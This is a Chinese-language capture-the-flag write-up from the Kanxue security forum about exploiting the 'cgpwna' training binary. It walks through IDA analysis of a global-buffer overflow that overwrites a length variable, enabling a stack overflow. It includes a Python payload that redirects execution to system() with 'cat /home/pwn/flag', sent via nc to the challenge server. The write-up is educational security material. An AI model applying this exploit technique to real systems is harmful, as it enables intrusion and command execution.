简单分析南邮实训平台pwn方向真题
简单分析南邮实训平台pwn方向第二题 - Stack Overflow
环境配置
系统 : Windows xp / ubuntu 32bit
程序 : cgpwna
要求 : 缓冲区溢出执行cat命令
使用工具 :IDA
开始分析
搜集线索
在linux系统中,使用file命令查看文件的信息:
➜ playground file cgpwna
cgpwna: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=8648818dcc39023c4dac61d2edb091bcd3fd3270, not stripped发现是32位的可执行程序,我们可以先运行一下,了解其输出:
➜ playground ./cgpwna
what do you want to do?
1.leave some message.
2.nothing.
your choice:
1
you can leave some message here:
123
your name please:
12333
Thank you
what do you want to do?
1.leave some message.
2.nothing.
your choice:
1
you can leave some message here:
1
your name please:
12
Thank you
what do you want to do?
1.leave some message.
2.nothing.
your choice:
2
bye直接用ida载入该程序,按下Shift+F12查看字符串列表:
.rodata:08048700 0000000C C echo hello!
.rodata:0804870C 00000018 C what do you want to do?
.rodata:08048724 00000016 C 1.leave some message.
.rodata:0804873A 0000000B C 2.nothing.
.rodata:08048745 0000000D C your choice:
.rodata:08048754 00000021 C you can leave some message here:
.rodata:08048775 00000012 C your name please:
.rodata:08048787 0000000A C Thank you
.eh_frame:08048813 00000005 C ;*2$\"双击字符串bye查看具体信息,这里通过交叉参考功能定位到main函数,按下F5查看其伪c代码:
int __cdecl main(int argc, const char **argv, const char **envp)
{
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
while ( 1 )
{
menu();
fgets(&choice, 100, stdin);
if ( choice != 49 )
break;
message();
}
puts("bye");
return 0;
}其中的两个函数内容如下:
int menu()
{
puts("what do you want to do?");
puts("1.leave some message.");
puts("2.nothing.");
return puts("your choice:");
}
int message()
{
char s; // [sp+18h] [bp-30h]@1
n = 10;
puts("you can leave some message here:");
fgets(A, 60, stdin);
puts("your name please:");
fgets(&s, n, stdin);
return puts("Thank you");
}查找溢出点
这里,接收用户输入的函数的fgets函数:
函数原型
char *fgets(char *buf, int bufsize, FILE *stream);
参数
*buf: 字符型指针,指向用来存储所得数据的地址。
bufsize: 整型数据,指明存储数据的大小。
*stream: 文件结构体指针,将要读取的文件流。该函数指定了buf的大小,看上去没有什么问题,我们再检查下缓冲区:
这里,缓冲区只有40字节的大小,却指定可以接受60个字节大小的数据呢。我们双击'A'查看详细信息:
.bss:0804A080 ; char A[40]
.bss:0804A080 A db 28h dup(?) ; DATA XREF: message+2Do
.bss:0804A0A8 ; int n
.bss:0804A0A8 n dd ? ; DATA XREF: message+6w
.bss:0804A0A8 ; message+4Br我们可以给予缓冲区A超过40字节的数据来替换掉n的值,这样就能溢出缓冲区s的值了:
fgets(&s, n, stdin);双击n查看函数栈视图:
-00000030 s db ?
-0000002F db ? ; undefined
-0000002E db ? ; undefined
-0000002D db ? ; undefined
-0000002C db ? ; undefined
-0000002B db ? ; undefined
-0000002A db ? ; undefined
-00000029 db ? ; undefined
-00000028 db ? ; undefined
-00000027 db ? ; undefined
-00000026 db ? ; undefined
-00000025 db ? ; undefined
-00000024 db ? ; undefined
-00000023 db ? ; undefined
-00000022 db ? ; undefined
-00000021 db ? ; undefined
-00000020 db ? ; undefined
-0000001F db ? ; undefined
-0000001E db ? ; undefined
-0000001D db ? ; undefined
-0000001C db ? ; undefined
-0000001B db ? ; undefined
-0000001A db ? ; undefined
-00000019 db ? ; undefined
-00000018 db ? ; undefined
-00000017 db ? ; undefined
-00000016 db ? ; undefined
-00000015 db ? ; undefined
-00000014 db ? ; undefined
-00000013 db ? ; undefined
-00000012 db ? ; undefined
-00000011 db ? ; undefined
-00000010 db ? ; undefined
-0000000F db ? ; undefined
-0000000E db ? ; undefined
-0000000D db ? ; undefined
-0000000C db ? ; undefined
-0000000B db ? ; undefined
-0000000A db ? ; undefined
-00000009 db ? ; undefined
-00000008 db ? ; undefined
-00000007 db ? ; undefined
-00000006 db ? ; undefined
-00000005 db ? ; undefined
-00000004 db ? ; undefined
-00000003 db ? ; undefined
-00000002 db ? ; undefined
-00000001 db ? ; undefined
+00000000 s db 4 dup(?)
+00000004 r db 4 dup(?)
+00000008
+00000008 ; end of stack variables此处我们知道,要溢出覆盖n的值,需要40+4个字节的数据填充;而要溢出覆盖函数返回地址,则需要30h+8h=38h(56)个字节的数据。
寻找现有函数
在ida的函数列表视图中,很轻松的找到了pwnme函数:
int pwnme()
{
return system("echo hello!");
}我们需要修改函数的参数,然后调用system函数执行cat命令查看flag文件。
推理
再来仔细看看函数的汇编代码:
.text:0804851D public pwnme
.text:0804851D pwnme proc near
.text:0804851D push ebp
.text:0804851E mov ebp, esp
.text:08048520 sub esp, 18h
.text:08048523 mov dword ptr [esp], offset command ; "echo hello!"
.text:0804852A call _system
.text:0804852F leave
.text:08048530 retn
.text:08048530 pwnme endp函数将command字符串的地址放入esp寄存器指向的栈空间,然后调用了system函数。
我们要做的事,就是将要执行的命令放入缓冲区A中(地址固定),然后将缓冲区A的地址,放入esp寄存器指向的栈空间中,最后直接跳转到地址0804852A调用system函数。
也就是说,我们想要利用漏洞执行cat命令,有两个条件:
能控制程序流程,让其跳转至地址
0804852A。确保esp指向的栈空间,保存的是输入的命令(缓冲区A)的地址。
我们知道,执行ret时会弹栈,esp会指向函数返回地址的下一格栈单元:
所以不妨填充函数返回地址下方的栈单元为offest A,当ret 指令跳转执行call system命令时,esp也指向了缓冲区A的地址。
编写shellcode
按照以上推理,用python编写shellcode如下:
cmd ='cat /home/pwn/flag\x001111111111111111111111111\n'
f = open('my_shellcode','w')
f.write('1\n')
f.write(cmd)
f.write('1111111111111111111111111111111111111111111111111111\x2A\x85\x04\x08\x80\xA0\x04\x08\n')
f.close()夺旗成功
连接服务器,用生成的文件作为输入:
➜ playground nc 182.254.217.142 10001 < my_shellcode
what do you want to do?
1.leave some message.
2.nothing.
your choice:
you can leave some message here:
your name please:
Thank you
flag{Naya_chyo_ma_thur_meh_lava_ma_puoru}参考链接
1、栈溢出漏洞的利用和缓解
https://evilpan.com/2018/03/17/exploit-the-stack/#top
2、fgets函数
https://baike.baidu.com/item/fgets/10942211?fr=aladdin
- End -
看雪ID:顾言庭
https://bbs.pediy.com/user-800468.htm
本文由看雪论坛 顾言庭 原创
转载请注明来自看雪社区
热门图书推荐:
(晋级赛Q1正在火热进行中~!比赛时间:3.10-3.24)
热门文章阅读
公众号ID:ikanxue
官方微博:看雪安全
商务合作:wsc@kanxue.com